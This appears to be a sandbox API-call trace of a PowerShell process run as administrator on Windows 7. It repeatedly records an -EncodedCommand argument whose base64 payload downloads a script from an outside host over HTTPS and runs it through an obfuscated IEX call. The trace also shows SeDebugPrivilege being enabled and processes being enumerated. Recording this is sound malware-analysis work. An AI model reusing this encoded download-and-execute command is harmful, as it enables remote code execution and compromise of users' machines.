	[0626.570] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x3d8860
	[0626.571] FindNextFileW (in: hFindFile=0x3d8860, lpFindFileData=0x1c78da90 | out: lpFindFileData=0x1c78da90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0626.571] FindClose (in: hFindFile=0x3d8860 | out: hFindFile=0x3d8860) returned 1
	[0626.571] SetErrorMode (uMode=0x1) returned 0x1
	[0626.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c78dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0626.572] SetErrorMode (uMode=0x1) returned 0x1
	[0626.572] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c78ddb0 | out: lpFileInformation=0x1c78ddb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0626.572] SetErrorMode (uMode=0x1) returned 0x1
	[0626.574] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0626.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.574] CoTaskMemFree (pv=0x38ec90) 
	[0626.575] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0626.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.575] CoTaskMemFree (pv=0x38ec90) 
	[0627.484] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0627.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.484] CoTaskMemFree (pv=0x38ec90) 
	[0627.495] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0627.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.495] CoTaskMemFree (pv=0x38ec90) 
	[0628.307] CoTaskMemAlloc (cb=0x3b) returned 0x3cf1b0
	[0628.307] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c78df98, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c78df98) returned 0x4550
	[0628.308] CoTaskMemFree (pv=0x3cf1b0) 
	[0628.311] GetConsoleWindow () returned 0x104c8
	[0628.327] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0629.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.059] CoTaskMemFree (pv=0x38ec90) 
	[0629.060] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0629.060] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0629.060] CoTaskMemFree (pv=0x38ec90) 
	[0629.066] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0629.066] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0629.066] CoTaskMemFree (pv=0x38ec90) 
	[0629.069] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c78dfe0 | out: pNumArgs=0x1c78dfe0) returned 0x1b7cad30*=""
	[0629.070] lstrlenW (lpString="-EncodedCommand") returned 15
	[0629.071] CoTaskMemAlloc (cb=0x22) returned 0x1b7f6d50
	[0629.071] RtlMoveMemory (in: Destination=0x1b7f6d50, Source=0x1b7cad52, Length=0x20 | out: Destination=0x1b7f6d50) 
	[0629.071] CoTaskMemFree (pv=0x1b7f6d50) 
	[0629.071] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0629.071] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7eb130
	[0629.071] RtlMoveMemory (in: Destination=0x1b7eb130, Source=0x1b7cad72, Length=0x2f2 | out: Destination=0x1b7eb130) 
	[0629.071] CoTaskMemFree (pv=0x1b7eb130) 
	[0629.072] LocalFree (hMem=0x1b7cad30) returned 0x0
	[0629.073] CoTaskMemAlloc (cb=0x804) returned 0x1b805d10
	[0629.073] GetConsoleTitleW (in: lpConsoleTitle=0x1b805d10, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0629.073] CoTaskMemFree (pv=0x1b805d10) 
	[0629.083] CoTaskMemAlloc (cb=0x38e) returned 0x1b7cad30
	[0629.083] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c78df40*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfeb18 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2cfeb18*(hProcess=0x398, hThread=0x34c, dwProcessId=0x19ec, dwThreadId=0x15b8)) returned 1
	[0629.755] CoTaskMemFree (pv=0x1b7cad30) 
	[0629.756] CloseHandle (hObject=0x34c) returned 1
	[0629.756] CoTaskMemAlloc (cb=0x3b) returned 0x3cf1b0
	[0629.756] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c78dfe8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c78dfe8) returned 0x4550
	[0629.757] CoTaskMemFree (pv=0x3cf1b0) 
	[0629.760] GetCurrentProcess () returned 0xffffffffffffffff
	[0629.760] GetCurrentProcess () returned 0xffffffffffffffff
	[0629.761] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x398, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c78e0c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c78e0c8*=0x34c) returned 1

Process:
	id = "92"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x7ad11000"
	os_pid = "0x11ac"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 478
	os_tid = 0x11b0

	[0577.820] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0584.753] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0584.753] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0584.753] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0584.753] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0597.035] GetVersionExW (in: lpVersionInformation=0x24dfc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dfc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0597.037] GetVersionExW (in: lpVersionInformation=0x24dfc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dfc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0597.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0598.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0598.152] GetVersionExW (in: lpVersionInformation=0x24dd30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dd30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0598.153] SetErrorMode (uMode=0x1) returned 0x1
	[0598.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24de90 | out: lpFileInformation=0x24de90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0598.155] SetErrorMode (uMode=0x1) returned 0x1
	[0598.162] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24e100 | out: lpdwHandle=0x24e100) returned 0x94c
	[0598.164] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b172d8 | out: lpData=0x2b172d8) returned 1
	[0598.166] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24e078, puLen=0x24e070 | out: lplpBuffer=0x24e078*=0x2b17374, puLen=0x24e070) returned 1
	[0598.169] lstrlenW (lpString="䅁") returned 1
	[0598.178] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b17450, puLen=0x24dfe0) returned 1
	[0598.179] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0598.181] CoTaskMemAlloc (cb=0x2e) returned 0x520530
	[0598.181] lstrcpyW (in: lpString1=0x520530, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0598.182] CoTaskMemFree (pv=0x520530) 
	[0598.182] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b174a4, puLen=0x24dfe0) returned 1
	[0598.182] lstrlenW (lpString="System.Management.Automation") returned 28
	[0598.182] CoTaskMemAlloc (cb=0x3c) returned 0x459860
	[0598.182] lstrcpyW (in: lpString1=0x459860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0598.182] CoTaskMemFree (pv=0x459860) 
	[0598.182] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b17500, puLen=0x24dfe0) returned 1
	[0598.182] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0598.182] CoTaskMemAlloc (cb=0x20) returned 0x51c680
	[0598.183] lstrcpyW (in: lpString1=0x51c680, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0598.183] CoTaskMemFree (pv=0x51c680) 
	[0598.183] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b17540, puLen=0x24dfe0) returned 1
	[0598.183] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0598.183] CoTaskMemAlloc (cb=0x44) returned 0x459860
	[0598.183] lstrcpyW (in: lpString1=0x459860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0598.183] CoTaskMemFree (pv=0x459860) 
	[0598.183] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b175a8, puLen=0x24dfe0) returned 1
	[0598.183] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0598.183] CoTaskMemAlloc (cb=0x76) returned 0x4bf340
	[0598.183] lstrcpyW (in: lpString1=0x4bf340, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0598.183] CoTaskMemFree (pv=0x4bf340) 
	[0598.183] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b17644, puLen=0x24dfe0) returned 1
	[0598.183] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0598.183] CoTaskMemAlloc (cb=0x44) returned 0x459860
	[0598.183] lstrcpyW (in: lpString1=0x459860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0598.183] CoTaskMemFree (pv=0x459860) 
	[0598.183] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b176a8, puLen=0x24dfe0) returned 1
	[0598.184] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0598.184] CoTaskMemAlloc (cb=0x58) returned 0x482760
	[0598.184] lstrcpyW (in: lpString1=0x482760, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0598.184] CoTaskMemFree (pv=0x482760) 
	[0598.184] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b17724, puLen=0x24dfe0) returned 1
	[0598.184] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0598.184] CoTaskMemAlloc (cb=0x20) returned 0x51c680
	[0598.184] lstrcpyW (in: lpString1=0x51c680, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0598.184] CoTaskMemFree (pv=0x51c680) 
	[0598.184] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b173cc, puLen=0x24dfe0) returned 1
	[0598.184] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0598.184] CoTaskMemAlloc (cb=0x66) returned 0x516f10
	[0598.184] lstrcpyW (in: lpString1=0x516f10, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0598.184] CoTaskMemFree (pv=0x516f10) 
	[0598.184] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x0, puLen=0x24dfe0) returned 0
	[0598.184] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x0, puLen=0x24dfe0) returned 0
	[0598.184] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x0, puLen=0x24dfe0) returned 0
	[0598.184] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dfb8, puLen=0x24dfb0 | out: lplpBuffer=0x24dfb8*=0x2b17374, puLen=0x24dfb0) returned 1
	[0599.202] CoTaskMemAlloc (cb=0x204) returned 0x4c7850
	[0599.202] VerLanguageNameW (in: wLang=0x0, szLang=0x4c7850, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0599.203] CoTaskMemFree (pv=0x4c7850) 
	[0599.204] VerQueryValueW (in: pBlock=0x2b172d8, lpSubBlock="\\", lplpBuffer=0x24e008, puLen=0x24e000 | out: lplpBuffer=0x24e008*=0x2b17300, puLen=0x24e000) returned 1
	[0599.209] GetCurrentProcessId () returned 0x11ac
	[0599.226] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24cf30 | out: lpLuid=0x24cf30*(LowPart=0x14, HighPart=0)) returned 1
	[0599.230] GetCurrentProcess () returned 0xffffffffffffffff
	[0599.231] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x24cf50 | out: TokenHandle=0x24cf50*=0x2e4) returned 1
	[0599.232] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2b1ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0599.233] CloseHandle (hObject=0x2e4) returned 1
	[0599.237] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11ac) returned 0x2e4
	[0600.646] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2b1abb8, cb=0x200, lpcbNeeded=0x24df68 | out: lphModule=0x2b1abb8, lpcbNeeded=0x24df68) returned 1
	[0600.648] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2b1ae28, cb=0x18 | out: lpmodinfo=0x2b1ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0600.649] CoTaskMemAlloc (cb=0x804) returned 0x526510
	[0600.649] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x526510, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0600.649] CoTaskMemFree (pv=0x526510) 
	[0600.650] CoTaskMemAlloc (cb=0x804) returned 0x526510
	[0600.650] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x526510, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0600.650] CoTaskMemFree (pv=0x526510) 
	[0600.651] CloseHandle (hObject=0x2e4) returned 1
	[0600.661] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x11ac) returned 0x2e4
	[0600.662] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x24e098 | out: lpExitCode=0x24e098*=0x103) returned 1
	[0600.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b1b088, Length=0x20000, ResultLength=0x24e060 | out: SystemInformation=0x12b1b088, ResultLength=0x24e060*=0x35d98) returned 0xc0000004
	[0602.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b3b0b8, Length=0x38598, ResultLength=0x24e060 | out: SystemInformation=0x12b3b0b8, ResultLength=0x24e060*=0x35d98) returned 0x0
	[0603.640] EnumWindows (lpEnumFunc=0x28e66ac, lParam=0x0) returned 1
	[0608.749] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0609.266] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x558
	[0609.269] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0610.713] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0610.716] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0611.474] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x538
	[0611.574] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0611.576] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x778
